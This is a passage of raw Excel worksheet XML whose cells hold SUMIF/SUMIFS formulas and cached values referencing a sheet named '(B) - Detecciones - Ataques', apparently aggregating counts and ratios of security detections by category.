      <c r="T11" s="59" t="s">
        <v>31</v>
      </c>
      <c r="U11" s="67" t="s">
        <v>1492</v>
      </c>
      <c r="V11" s="69" t="s">
        <v>1493</v>
      </c>
      <c r="W11" s="68" t="s">
        <v>1503</v>
      </c>
      <c r="X11" s="69" t="s">
        <v>1501</v>
      </c>
      <c r="Y11" s="56" t="s">
        <v>1502</v>
      </c>
      <c r="AA11" s="59" t="s">
        <v>31</v>
      </c>
      <c r="AB11" s="67" t="s">
        <v>1492</v>
      </c>
      <c r="AC11" s="69" t="s">
        <v>1493</v>
      </c>
      <c r="AD11" s="56" t="s">
        <v>1503</v>
      </c>
      <c r="AE11" s="69" t="s">
        <v>1501</v>
      </c>
      <c r="AF11" s="56" t="s">
        <v>1502</v>
      </c>
      <c r="AL11" s="55" t="s">
        <v>34</v>
      </c>
      <c r="AM11" s="270" t="s">
        <v>1492</v>
      </c>
      <c r="AN11" s="70" t="s">
        <v>1493</v>
      </c>
      <c r="AO11" s="56" t="s">
        <v>1503</v>
      </c>
      <c r="AP11" s="70" t="s">
        <v>1501</v>
      </c>
      <c r="AQ11" s="56" t="s">
        <v>1502</v>
      </c>
      <c r="AS11" s="55" t="s">
        <v>34</v>
      </c>
      <c r="AT11" s="270" t="s">
        <v>1492</v>
      </c>
      <c r="AU11" s="70" t="s">
        <v>1493</v>
      </c>
      <c r="AV11" s="56" t="s">
        <v>1503</v>
      </c>
      <c r="AW11" s="70" t="s">
        <v>1501</v>
      </c>
      <c r="AX11" s="56" t="s">
        <v>1502</v>
      </c>
    </row>
    <row r="12" ht="60.0" customHeight="1">
      <c r="B12" s="71" t="s">
        <v>97</v>
      </c>
      <c r="C12" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D12" s="72" t="s">
        <v>99</v>
      </c>
      <c r="E12" s="73" t="s">
        <v>1504</v>
      </c>
      <c r="F12" s="271">
        <f>'(B) - Detecciones - Ataques'!P3</f>
        <v>2060</v>
      </c>
      <c r="G12" s="271">
        <f>'(B) - Detecciones - Ataques'!DJ3</f>
        <v>71</v>
      </c>
      <c r="H12" s="272">
        <f>'(B) - Detecciones - Ataques'!DQ3</f>
        <v>0.03446601942</v>
      </c>
      <c r="I12" s="271">
        <f>'(B) - Detecciones - Ataques'!AS3</f>
        <v>4</v>
      </c>
      <c r="J12" s="272">
        <f>'(B) - Detecciones - Ataques'!AZ3</f>
        <v>0.001941747573</v>
      </c>
      <c r="K12" s="271">
        <f>'(B) - Detecciones - Ataques'!BP3</f>
        <v>40</v>
      </c>
      <c r="L12" s="272">
        <f>'(B) - Detecciones - Ataques'!BW3</f>
        <v>0.01941747573</v>
      </c>
      <c r="M12" s="271">
        <f>'(B) - Detecciones - Ataques'!CM3</f>
        <v>47</v>
      </c>
      <c r="N12" s="272">
        <f>'(B) - Detecciones - Ataques'!CT3</f>
        <v>0.02281553398</v>
      </c>
      <c r="O12" s="271">
        <f>'(B) - Detecciones - Ataques'!EC3</f>
        <v>19</v>
      </c>
      <c r="P12" s="272">
        <f>'(B) - Detecciones - Ataques'!ED3</f>
        <v>0.009223300971</v>
      </c>
      <c r="Q12" s="273" t="s">
        <v>13</v>
      </c>
      <c r="T12" s="274" t="s">
        <v>97</v>
      </c>
      <c r="U12" s="275">
        <f>SUMIF($B$12:$B$137,$T12,$F$12:$F$137)+SUMIF($C$12:$C$137,$T12,$F$12:$F$137)</f>
        <v>6849</v>
      </c>
      <c r="V12" s="275">
        <f t="shared" ref="V12:V24" si="1">SUMIF($B$12:$B$137,$T12,$G$12:$G$137)+SUMIF($C$12:$C$137,$T12,$G$12:$G$137)</f>
        <v>146</v>
      </c>
      <c r="W12" s="276">
        <f t="shared" ref="W12:W24" si="2">V12/U12</f>
        <v>0.02131698058</v>
      </c>
      <c r="X12" s="275">
        <f t="shared" ref="X12:X24" si="3">SUMIF($B$12:$B$137,$T12,$O$12:$O$137)+SUMIF($C$12:$C$137,$T12,$O$12:$O$137)</f>
        <v>20</v>
      </c>
      <c r="Y12" s="277">
        <f t="shared" ref="Y12:Y24" si="4">X12/U12</f>
        <v>0.002920134326</v>
      </c>
      <c r="Z12" s="278"/>
      <c r="AA12" s="274" t="s">
        <v>97</v>
      </c>
      <c r="AB12" s="275">
        <f>SUMIFS($F$12:$F$137,$Q$12:$Q$137,"✔",$B$12:$B$137,$AA12)+SUMIFS($F$12:$F$137,$Q$12:$Q$137,"✔",$C$12:$C$137,$AA12)</f>
        <v>6848</v>
      </c>
      <c r="AC12" s="275">
        <f t="shared" ref="AC12:AC24" si="5">SUMIFS($G$12:$G$137,$Q$12:$Q$137,"✔",$B$12:$B$137,$AA12)+SUMIFS($G$12:$G$137,$Q$12:$Q$137,"✔",$C$12:$C$137,$AA12)</f>
        <v>146</v>
      </c>
      <c r="AD12" s="276">
        <f t="shared" ref="AD12:AD24" si="6">AC12/AB12</f>
        <v>0.02132009346</v>
      </c>
      <c r="AE12" s="275">
        <f t="shared" ref="AE12:AE24" si="7">SUMIFS($O$12:$O$137,$Q$12:$Q$137,"✔",$B$12:$B$137,$AA12)+SUMIFS($O$12:$O$137,$Q$12:$Q$137,"✔",$C$12:$C$137,$AA12)</f>
        <v>20</v>
      </c>
      <c r="AF12" s="277">
        <f t="shared" ref="AF12:AF24" si="8">AE12/AB12</f>
        <v>0.002920560748</v>
      </c>
      <c r="AG12" s="278"/>
      <c r="AH12" s="278"/>
      <c r="AI12" s="278"/>
      <c r="AJ12" s="278"/>
      <c r="AK12" s="278"/>
      <c r="AL12" s="279" t="s">
        <v>99</v>
      </c>
      <c r="AM12" s="173">
        <f t="shared" ref="AM12:AM87" si="9">SUMIF($D$12:$D$137,$AL12,$F$12:$F$137)</f>
        <v>6846</v>
      </c>
      <c r="AN12" s="173">
        <f t="shared" ref="AN12:AN87" si="10">SUMIF($D$12:$D$137,$AL12,$G$12:$G$137)</f>
        <v>145</v>
      </c>
      <c r="AO12" s="276">
        <f t="shared" ref="AO12:AO87" si="11">AN12/AM12</f>
        <v>0.02118025124</v>
      </c>
      <c r="AP12" s="173">
        <f t="shared" ref="AP12:AP87" si="12">SUMIF($D$12:$D$137,$AL12,$O$12:$O$137)</f>
        <v>20</v>
      </c>
      <c r="AQ12" s="277">
        <f t="shared" ref="AQ12:AQ87" si="13">AP12/AM12</f>
        <v>0.002921413964</v>
      </c>
      <c r="AR12" s="278"/>
      <c r="AS12" s="279" t="s">
        <v>99</v>
      </c>
      <c r="AT12" s="173">
        <f t="shared" ref="AT12:AT87" si="14">SUMIFS($F$12:$F$137,$D$12:$D$137,$AS12,$Q$12:$Q$137,"✔")</f>
        <v>6846</v>
      </c>
      <c r="AU12" s="173">
        <f t="shared" ref="AU12:AU87" si="15">SUMIFS($G$12:$G$137,$D$12:$D$137,$AS12,$Q$12:$Q$137,"✔")</f>
        <v>145</v>
      </c>
      <c r="AV12" s="276">
        <f t="shared" ref="AV12:AV13" si="16">IF(AT12=0,"",AU12/AT12)</f>
        <v>0.02118025124</v>
      </c>
      <c r="AW12" s="173">
        <f t="shared" ref="AW12:AW87" si="17">SUMIFS($O$12:$O$137,$D$12:$D$137,$AS12,$Q$12:$Q$137,"✔")</f>
        <v>20</v>
      </c>
      <c r="AX12" s="277">
        <f t="shared" ref="AX12:AX87" si="18">IF(AT12=0,"-",AW12/AT12)</f>
        <v>0.002921413964</v>
      </c>
      <c r="AY12" s="278"/>
      <c r="AZ12" s="278"/>
      <c r="BA12" s="278"/>
      <c r="BB12" s="278"/>
      <c r="BC12" s="278"/>
      <c r="BD12" s="278"/>
      <c r="BE12" s="278"/>
      <c r="BF12" s="278"/>
      <c r="BG12" s="278"/>
      <c r="BH12" s="278"/>
      <c r="BI12" s="278"/>
      <c r="BJ12" s="278"/>
      <c r="BK12" s="278"/>
      <c r="BL12" s="278"/>
      <c r="BM12" s="278"/>
      <c r="BN12" s="278"/>
      <c r="BO12" s="278"/>
    </row>
    <row r="13" ht="60.0" customHeight="1">
      <c r="B13" s="142" t="s">
        <v>97</v>
      </c>
      <c r="C13" s="144" t="s">
        <v>12</v>
      </c>
      <c r="D13" s="144" t="s">
        <v>99</v>
      </c>
      <c r="E13" s="145" t="s">
        <v>140</v>
      </c>
      <c r="F13" s="280">
        <f>'(B) - Detecciones - Ataques'!P4</f>
        <v>171</v>
      </c>
      <c r="G13" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ4</f>
        <v>0</v>
      </c>
      <c r="H13" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ4</f>
        <v>0</v>
      </c>
      <c r="I13" s="271">
        <f>'(B) - Detecciones - Ataques'!AS4</f>
        <v>0</v>
      </c>
      <c r="J13" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ4</f>
        <v>0</v>
      </c>
      <c r="K13" s="271">
        <f>'(B) - Detecciones - Ataques'!BP4</f>
        <v>0</v>
      </c>
      <c r="L13" s="281">
        <f>'(B) - Detecciones - Ataques'!BW4</f>
        <v>0</v>
      </c>
      <c r="M13" s="271">
        <f>'(B) - Detecciones - Ataques'!CM4</f>
        <v>0</v>
      </c>
      <c r="N13" s="281">
        <f>'(B) - Detecciones - Ataques'!CT4</f>
        <v>0</v>
      </c>
      <c r="O13" s="280">
        <f>'(B) - Detecciones - Ataques'!EC4</f>
        <v>0</v>
      </c>
      <c r="P13" s="281">
        <f>'(B) - Detecciones - Ataques'!ED4</f>
        <v>0</v>
      </c>
      <c r="Q13" s="282" t="s">
        <v>13</v>
      </c>
      <c r="T13" s="283" t="s">
        <v>204</v>
      </c>
      <c r="U13" s="275">
        <f t="shared" ref="U13:U24" si="19">SUMIF($B$12:$B$137,T13,$F$12:$F$137)+SUMIF($C$12:$C$137,T13,$F$12:$F$137)</f>
        <v>5</v>
      </c>
      <c r="V13" s="275">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="W13" s="284">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="X13" s="275">
        <f t="shared" si="3"/>
        <v>153</v>
      </c>
      <c r="Y13" s="285">
        <f t="shared" si="4"/>
        <v>30.6</v>
      </c>
      <c r="Z13" s="278"/>
      <c r="AA13" s="283" t="s">
        <v>204</v>
      </c>
      <c r="AB13" s="275">
        <f t="shared" ref="AB13:AB24" si="20">SUMIFS($F$12:$F$137,$Q$12:$Q$137,"✔",$B$12:$B$137,AA13)+SUMIFS($F$12:$F$137,$Q$12:$Q$137,"✔",$C$12:$C$137,AA13)</f>
        <v>1</v>
      </c>
      <c r="AC13" s="275">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="AD13" s="284">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="AE13" s="275">
        <f t="shared" si="7"/>
        <v>153</v>
      </c>
      <c r="AF13" s="285">
        <f t="shared" si="8"/>
        <v>153</v>
      </c>
      <c r="AG13" s="278"/>
      <c r="AH13" s="278"/>
      <c r="AI13" s="278"/>
      <c r="AJ13" s="278"/>
      <c r="AK13" s="278"/>
      <c r="AL13" s="286" t="s">
        <v>168</v>
      </c>
      <c r="AM13" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN13" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO13" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP13" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ13" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AR13" s="278"/>
      <c r="AS13" s="286" t="s">
        <v>168</v>
      </c>
      <c r="AT13" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU13" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV13" s="284">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="AW13" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX13" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="AY13" s="278"/>
      <c r="AZ13" s="278"/>
      <c r="BA13" s="278"/>
      <c r="BB13" s="278"/>
      <c r="BC13" s="278"/>
      <c r="BD13" s="278"/>
      <c r="BE13" s="278"/>
      <c r="BF13" s="278"/>
      <c r="BG13" s="278"/>
      <c r="BH13" s="278"/>
      <c r="BI13" s="278"/>
      <c r="BJ13" s="278"/>
      <c r="BK13" s="278"/>
      <c r="BL13" s="278"/>
      <c r="BM13" s="278"/>
      <c r="BN13" s="278"/>
      <c r="BO13" s="278"/>
    </row>
    <row r="14" ht="60.0" customHeight="1">
      <c r="B14" s="142" t="s">
        <v>97</v>
      </c>
      <c r="C14" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D14" s="143" t="s">
        <v>99</v>
      </c>
      <c r="E14" s="145" t="s">
        <v>153</v>
      </c>
      <c r="F14" s="280">
        <f>'(B) - Detecciones - Ataques'!P5</f>
        <v>4615</v>
      </c>
      <c r="G14" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ5</f>
        <v>74</v>
      </c>
      <c r="H14" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ5</f>
        <v>0.01603466956</v>
      </c>
      <c r="I14" s="271">
        <f>'(B) - Detecciones - Ataques'!AS5</f>
        <v>43</v>
      </c>
      <c r="J14" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ5</f>
        <v>0.00931744312</v>
      </c>
      <c r="K14" s="271">
        <f>'(B) - Detecciones - Ataques'!BP5</f>
        <v>57</v>
      </c>
      <c r="L14" s="281">
        <f>'(B) - Detecciones - Ataques'!BW5</f>
        <v>0.01235102925</v>
      </c>
      <c r="M14" s="271">
        <f>'(B) - Detecciones - Ataques'!CM5</f>
        <v>62</v>
      </c>
      <c r="N14" s="281">
        <f>'(B) - Detecciones - Ataques'!CT5</f>
        <v>0.01343445287</v>
      </c>
      <c r="O14" s="280">
        <f>'(B) - Detecciones - Ataques'!EC5</f>
        <v>1</v>
      </c>
      <c r="P14" s="281">
        <f>'(B) - Detecciones - Ataques'!ED5</f>
        <v>0.0002166847237</v>
      </c>
      <c r="Q14" s="282" t="s">
        <v>13</v>
      </c>
      <c r="T14" s="283" t="s">
        <v>261</v>
      </c>
      <c r="U14" s="275">
        <f t="shared" si="19"/>
        <v>198</v>
      </c>
      <c r="V14" s="275">
        <f t="shared" si="1"/>
        <v>79</v>
      </c>
      <c r="W14" s="284">
        <f t="shared" si="2"/>
        <v>0.398989899</v>
      </c>
      <c r="X14" s="275">
        <f t="shared" si="3"/>
        <v>116</v>
      </c>
      <c r="Y14" s="285">
        <f t="shared" si="4"/>
        <v>0.5858585859</v>
      </c>
      <c r="Z14" s="278"/>
      <c r="AA14" s="283" t="s">
        <v>261</v>
      </c>
      <c r="AB14" s="275">
        <f t="shared" si="20"/>
        <v>194</v>
      </c>
      <c r="AC14" s="275">
        <f t="shared" si="5"/>
        <v>78</v>
      </c>
      <c r="AD14" s="284">
        <f t="shared" si="6"/>
        <v>0.4020618557</v>
      </c>
      <c r="AE14" s="275">
        <f t="shared" si="7"/>
        <v>115</v>
      </c>
      <c r="AF14" s="285">
        <f t="shared" si="8"/>
        <v>0.5927835052</v>
      </c>
      <c r="AG14" s="278"/>
      <c r="AH14" s="278"/>
      <c r="AI14" s="278"/>
      <c r="AJ14" s="278"/>
      <c r="AK14" s="278"/>
      <c r="AL14" s="287" t="s">
        <v>180</v>
      </c>
      <c r="AM14" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN14" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO14" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP14" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ14" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AR14" s="278"/>
      <c r="AS14" s="287" t="s">
        <v>180</v>
      </c>
      <c r="AT14" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU14" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV14" s="284" t="str">
        <f t="shared" ref="AV14:AV87" si="21">IF(AT14=0,"-",AU14/AT14)</f>
        <v>-</v>
      </c>
      <c r="AW14" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX14" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
      <c r="AY14" s="278"/>
      <c r="AZ14" s="278"/>
      <c r="BA14" s="278"/>
      <c r="BB14" s="278"/>
      <c r="BC14" s="278"/>
      <c r="BD14" s="278"/>
      <c r="BE14" s="278"/>
      <c r="BF14" s="278"/>
      <c r="BG14" s="278"/>
      <c r="BH14" s="278"/>
      <c r="BI14" s="278"/>
      <c r="BJ14" s="278"/>
      <c r="BK14" s="278"/>
      <c r="BL14" s="278"/>
      <c r="BM14" s="278"/>
      <c r="BN14" s="278"/>
      <c r="BO14" s="278"/>
    </row>
    <row r="15" ht="60.0" customHeight="1">
      <c r="B15" s="142" t="s">
        <v>97</v>
      </c>
      <c r="C15" s="144" t="s">
        <v>12</v>
      </c>
      <c r="D15" s="144" t="s">
        <v>168</v>
      </c>
      <c r="E15" s="145" t="s">
        <v>1505</v>
      </c>
      <c r="F15" s="280">
        <f>'(B) - Detecciones - Ataques'!P6</f>
        <v>1</v>
      </c>
      <c r="G15" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ6</f>
        <v>1</v>
      </c>
      <c r="H15" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ6</f>
        <v>1</v>
      </c>
      <c r="I15" s="271">
        <f>'(B) - Detecciones - Ataques'!AS6</f>
        <v>1</v>
      </c>
      <c r="J15" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ6</f>
        <v>1</v>
      </c>
      <c r="K15" s="271">
        <f>'(B) - Detecciones - Ataques'!BP6</f>
        <v>1</v>
      </c>
      <c r="L15" s="281">
        <f>'(B) - Detecciones - Ataques'!BW6</f>
        <v>1</v>
      </c>
      <c r="M15" s="271">
        <f>'(B) - Detecciones - Ataques'!CM6</f>
        <v>1</v>
      </c>
      <c r="N15" s="281">
        <f>'(B) - Detecciones - Ataques'!CT6</f>
        <v>1</v>
      </c>
      <c r="O15" s="280">
        <f>'(B) - Detecciones - Ataques'!EC6</f>
        <v>0</v>
      </c>
      <c r="P15" s="281">
        <f>'(B) - Detecciones - Ataques'!ED6</f>
        <v>0</v>
      </c>
      <c r="Q15" s="282" t="s">
        <v>13</v>
      </c>
      <c r="T15" s="283" t="s">
        <v>262</v>
      </c>
      <c r="U15" s="275">
        <f t="shared" si="19"/>
        <v>217</v>
      </c>
      <c r="V15" s="275">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="W15" s="284">
        <f t="shared" si="2"/>
        <v>0.01382488479</v>
      </c>
      <c r="X15" s="275">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="Y15" s="285">
        <f t="shared" si="4"/>
        <v>0.004608294931</v>
      </c>
      <c r="Z15" s="278"/>
      <c r="AA15" s="283" t="s">
        <v>262</v>
      </c>
      <c r="AB15" s="275">
        <f t="shared" si="20"/>
        <v>5</v>
      </c>
      <c r="AC15" s="275">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="AD15" s="284">
        <f t="shared" si="6"/>
        <v>0.6</v>
      </c>
      <c r="AE15" s="275">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="AF15" s="285">
        <f t="shared" si="8"/>
        <v>0.2</v>
      </c>
      <c r="AG15" s="278"/>
      <c r="AH15" s="278"/>
      <c r="AI15" s="278"/>
      <c r="AJ15" s="278"/>
      <c r="AK15" s="278"/>
      <c r="AL15" s="287" t="s">
        <v>193</v>
      </c>
      <c r="AM15" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN15" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO15" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP15" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ15" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AR15" s="278"/>
      <c r="AS15" s="287" t="s">
        <v>193</v>
      </c>
      <c r="AT15" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU15" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV15" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW15" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX15" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="AY15" s="278"/>
      <c r="AZ15" s="278"/>
      <c r="BA15" s="278"/>
      <c r="BB15" s="278"/>
      <c r="BC15" s="278"/>
      <c r="BD15" s="278"/>
      <c r="BE15" s="278"/>
      <c r="BF15" s="278"/>
      <c r="BG15" s="278"/>
      <c r="BH15" s="278"/>
      <c r="BI15" s="278"/>
      <c r="BJ15" s="278"/>
      <c r="BK15" s="278"/>
      <c r="BL15" s="278"/>
      <c r="BM15" s="278"/>
      <c r="BN15" s="278"/>
      <c r="BO15" s="278"/>
    </row>
    <row r="16" ht="60.0" customHeight="1">
      <c r="B16" s="142" t="s">
        <v>97</v>
      </c>
      <c r="C16" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D16" s="143" t="s">
        <v>180</v>
      </c>
      <c r="E16" s="145" t="s">
        <v>186</v>
      </c>
      <c r="F16" s="280">
        <f>'(B) - Detecciones - Ataques'!P7</f>
        <v>1</v>
      </c>
      <c r="G16" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ7</f>
        <v>0</v>
      </c>
      <c r="H16" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ7</f>
        <v>0</v>
      </c>
      <c r="I16" s="271">
        <f>'(B) - Detecciones - Ataques'!AS7</f>
        <v>0</v>
      </c>
      <c r="J16" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ7</f>
        <v>0</v>
      </c>
      <c r="K16" s="271">
        <f>'(B) - Detecciones - Ataques'!BP7</f>
        <v>0</v>
      </c>
      <c r="L16" s="281">
        <f>'(B) - Detecciones - Ataques'!BW7</f>
        <v>0</v>
      </c>
      <c r="M16" s="271">
        <f>'(B) - Detecciones - Ataques'!CM7</f>
        <v>0</v>
      </c>
      <c r="N16" s="281">
        <f>'(B) - Detecciones - Ataques'!CT7</f>
        <v>0</v>
      </c>
      <c r="O16" s="280">
        <f>'(B) - Detecciones - Ataques'!EC7</f>
        <v>0</v>
      </c>
      <c r="P16" s="281">
        <f>'(B) - Detecciones - Ataques'!ED7</f>
        <v>0</v>
      </c>
      <c r="Q16" s="282" t="s">
        <v>112</v>
      </c>
      <c r="T16" s="283" t="s">
        <v>450</v>
      </c>
      <c r="U16" s="275">
        <f t="shared" si="19"/>
        <v>22</v>
      </c>
      <c r="V16" s="275">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="W16" s="284">
        <f t="shared" si="2"/>
        <v>0.2272727273</v>
      </c>
      <c r="X16" s="275">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="Y16" s="285">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Z16" s="278"/>
      <c r="AA16" s="283" t="s">
        <v>450</v>
      </c>
      <c r="AB16" s="275">
        <f t="shared" si="20"/>
        <v>9</v>
      </c>
      <c r="AC16" s="275">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="AD16" s="284">
        <f t="shared" si="6"/>
        <v>0.4444444444</v>
      </c>
      <c r="AE16" s="275">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="AF16" s="285">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AG16" s="278"/>
      <c r="AH16" s="278"/>
      <c r="AI16" s="278"/>
      <c r="AJ16" s="278"/>
      <c r="AK16" s="278"/>
      <c r="AL16" s="287" t="s">
        <v>206</v>
      </c>
      <c r="AM16" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN16" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO16" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP16" s="275">
        <f t="shared" si="12"/>
        <v>153</v>
      </c>
      <c r="AQ16" s="285">
        <f t="shared" si="13"/>
        <v>153</v>
      </c>
      <c r="AR16" s="278"/>
      <c r="AS16" s="287" t="s">
        <v>206</v>
      </c>
      <c r="AT16" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU16" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV16" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW16" s="275">
        <f t="shared" si="17"/>
        <v>153</v>
      </c>
      <c r="AX16" s="285">
        <f t="shared" si="18"/>
        <v>153</v>
      </c>
      <c r="AY16" s="278"/>
      <c r="AZ16" s="278"/>
      <c r="BA16" s="278"/>
      <c r="BB16" s="278"/>
      <c r="BC16" s="278"/>
      <c r="BD16" s="278"/>
      <c r="BE16" s="278"/>
      <c r="BF16" s="278"/>
      <c r="BG16" s="278"/>
      <c r="BH16" s="278"/>
      <c r="BI16" s="278"/>
      <c r="BJ16" s="278"/>
      <c r="BK16" s="278"/>
      <c r="BL16" s="278"/>
      <c r="BM16" s="278"/>
      <c r="BN16" s="278"/>
      <c r="BO16" s="278"/>
    </row>
    <row r="17" ht="60.0" customHeight="1">
      <c r="B17" s="142" t="s">
        <v>97</v>
      </c>
      <c r="C17" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D17" s="143" t="s">
        <v>193</v>
      </c>
      <c r="E17" s="145" t="s">
        <v>199</v>
      </c>
      <c r="F17" s="280">
        <f>'(B) - Detecciones - Ataques'!P8</f>
        <v>1</v>
      </c>
      <c r="G17" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ8</f>
        <v>0</v>
      </c>
      <c r="H17" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ8</f>
        <v>0</v>
      </c>
      <c r="I17" s="271">
        <f>'(B) - Detecciones - Ataques'!AS8</f>
        <v>0</v>
      </c>
      <c r="J17" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ8</f>
        <v>0</v>
      </c>
      <c r="K17" s="271">
        <f>'(B) - Detecciones - Ataques'!BP8</f>
        <v>0</v>
      </c>
      <c r="L17" s="281">
        <f>'(B) - Detecciones - Ataques'!BW8</f>
        <v>0</v>
      </c>
      <c r="M17" s="271">
        <f>'(B) - Detecciones - Ataques'!CM8</f>
        <v>0</v>
      </c>
      <c r="N17" s="281">
        <f>'(B) - Detecciones - Ataques'!CT8</f>
        <v>0</v>
      </c>
      <c r="O17" s="280">
        <f>'(B) - Detecciones - Ataques'!EC8</f>
        <v>0</v>
      </c>
      <c r="P17" s="281">
        <f>'(B) - Detecciones - Ataques'!ED8</f>
        <v>0</v>
      </c>
      <c r="Q17" s="282" t="s">
        <v>13</v>
      </c>
      <c r="T17" s="283" t="s">
        <v>534</v>
      </c>
      <c r="U17" s="275">
        <f t="shared" si="19"/>
        <v>12</v>
      </c>
      <c r="V17" s="275">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="W17" s="284">
        <f t="shared" si="2"/>
        <v>0.1666666667</v>
      </c>
      <c r="X17" s="275">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="Y17" s="285">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Z17" s="278"/>
      <c r="AA17" s="283" t="s">
        <v>534</v>
      </c>
      <c r="AB17" s="275">
        <f t="shared" si="20"/>
        <v>6</v>
      </c>
      <c r="AC17" s="275">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="AD17" s="284">
        <f t="shared" si="6"/>
        <v>0.3333333333</v>
      </c>
      <c r="AE17" s="275">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="AF17" s="285">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AG17" s="278"/>
      <c r="AH17" s="278"/>
      <c r="AI17" s="278"/>
      <c r="AJ17" s="278"/>
      <c r="AK17" s="278"/>
      <c r="AL17" s="287" t="s">
        <v>222</v>
      </c>
      <c r="AM17" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN17" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO17" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP17" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ17" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AR17" s="278"/>
      <c r="AS17" s="287" t="s">
        <v>222</v>
      </c>
      <c r="AT17" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU17" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV17" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW17" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX17" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
      <c r="AY17" s="278"/>
      <c r="AZ17" s="278"/>
      <c r="BA17" s="278"/>
      <c r="BB17" s="278"/>
      <c r="BC17" s="278"/>
      <c r="BD17" s="278"/>
      <c r="BE17" s="278"/>
      <c r="BF17" s="278"/>
      <c r="BG17" s="278"/>
      <c r="BH17" s="278"/>
      <c r="BI17" s="278"/>
